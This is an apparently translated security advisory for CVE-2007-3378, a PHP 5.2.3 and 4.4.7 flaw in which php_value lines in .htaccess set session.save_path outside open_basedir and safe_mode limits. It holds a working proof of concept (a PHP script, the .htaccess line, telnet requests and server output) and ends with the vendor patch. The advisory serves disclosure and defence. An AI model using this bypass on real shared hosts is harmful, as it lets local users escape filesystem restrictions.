Secure transfer: Security Restriction vulnerability in PHP processing. htaccess files

Affected Systems:

PHP 5.2.3

PHP 4.4.7

Unaffected system:

PHP 5.2.4

Description:

--------------------------------------------------------------------------------

Bugtraq id: 24661,25498

CVE (CAN) ID: CVE-2007-3378

PHP is a widely used scripting language. It is especially suitable for Web development and can be embedded into HTML.

PHP has a vulnerability in processing configuration in the. htaccess file. Local attackers may exploit this vulnerability to bypass some security restrictions of PHP.

If you use PHP as the Apache module, you can use the command in the. htaccess file to change the configuration settings. You can use these options to change permissions such as display_errors, but you can bypass the safe_mode or open_basedir security restrictions in different functions. For example, you can set session. save_path through. htaccess. In the session_save_path () and ini_set () functions, safe_mode and open_basedir are checked for the save_path, but this check can be bypassed in. htaccess.

Example:

cxib# ls -la /www/cxib/total 14drwxr-xr-x 3 cxib www 512 Feb 16 20:20 .drwxr-xr-x 11 www www 7168 Feb 16 20:07 ..- -rw-r--r-- 1 cxib www 53 Feb 16 20:19 stars.phpdrwxr-xr-x 2 cxib www 512 Feb 16 20:18 tempscxib# cat /www/cxib/stars.php<?phpsession_save_path("/inne");session_start();?>cxib# telnet 0 80Trying 0.0.0.0...Connected to 0.Escape character is ´^]´.GET /cxib/stars.php HTTP/1.1Host: localhostHTTP/1.1 200 OKDate: Fri, 16 Feb 2007 19:22:58 GMTServer: Apache/2.2.4 (FreeBSD) mod_ssl/2.2.4 OpenSSL/0.9.7e-p1DAV/2 PHP/5.2.1X-Powered-By: PHP/5.2.1Content-Length: 732Content-Type: text/html<br /><b>Warning</b>: session_save_path() [<ahref="/´";function.session-save-path´>function.session-save-path&lt;/a>]:open_basedir restriction in effect. File(/inne) is not within theallowedpath(s): (/www) in <b>/www/cxib/stars.php</b> on line<b>2</b><br /><br /><b>Warning</b>: session_start() [<ahref="/´";function.session-start´>function.session-start</a>]: open_basedirrestriction in effect. File(/var/tmp/) is not within the allowedpath(s):(/www) in <b>/www/cxib/stars.php</b> on line<b>3</b><br /><br /><b>Fatal error</b>: session_start() [<ahref="/´";function.session-start´>function.session-start&lt;/a>]: Failed toinitialize storage module: files (path: ) in<b>/www/cxib/stars.php</b> online <b>3</b><br />Connection closed by foreign host.cxib#

Therefore, you cannot create a session in the directory, but you can create a. htaccess file. Therefore, you can write:

- ---php_value session.save_path /inne- ---cxib# ls -la /www/cxib/total 16drwxr-xr-x 3 cxib www 512 Feb 16 20:26 .drwxr-xr-x 11 www www 7168 Feb 16 20:26 ..- -rw-r--r-- 1 cxib www 34 Feb 16 20:26 .htaccess- -rw-r--r-- 1 cxib www 53 Feb 16 20:19 stars.phpdrwxr-xr-x 2 cxib www 512 Feb 16 20:18 tempscxib# cat /www/cxib/.htaccessphp_value session.save_path /innecxib# cat /www/cxib/stars.php<?phpsession_start();?>

You cannot set session. save_path through ini_set () or session_save_path (), but send the following request:

cxib# telnet 0 80Trying 0.0.0.0...Connected to 0.Escape character is ´^]´.GET /cxib/stars.php HTTP/1.1Host: localhostHTTP/1.1 200 OKDate: Fri, 16 Feb 2007 19:30:42 GMTServer: Apache/2.2.4 (FreeBSD) mod_ssl/2.2.4 OpenSSL/0.9.7e-p1DAV/2 PHP/5.2.1X-Powered-By: PHP/5.2.1Set-Cookie: PHPSESSID=45cae9284f2f8b7cb05ce96021c9bf4e; path=/Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0,pre-check=0Pragma: no-cacheContent-Length: 0Content-Type: text/htmlConnection closed by foreign host.cxib#cxib# ls -la /innetotal 3drwxrwxrwx 2 root wheel 512 Feb 16 20:30 .drwxr-xr-x 24 root wheel 1024 Feb 16 20:05 ..- -rw------- 1 www wheel 0 Feb 16 20:30sess_45cae9284f2f8b7cb05ce96021c9bf4e

This bypasses the Open_basedir and safe_mode restrictions. Error_log also has the same problem with some other functions.

<* Source: Maksymilian Arciemowicz (max@jestsuper.pl)

Link: http://securityreason.com/achievement_securityalert/45

Http://secunia.com/advisories/26642/

Http://www.php.net/releases/5_2_4.php

*>

Suggestion:

--------------------------------------------------------------------------------

Vendor patch:

PHP

---

The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:

Http://www.php.net/downloads.php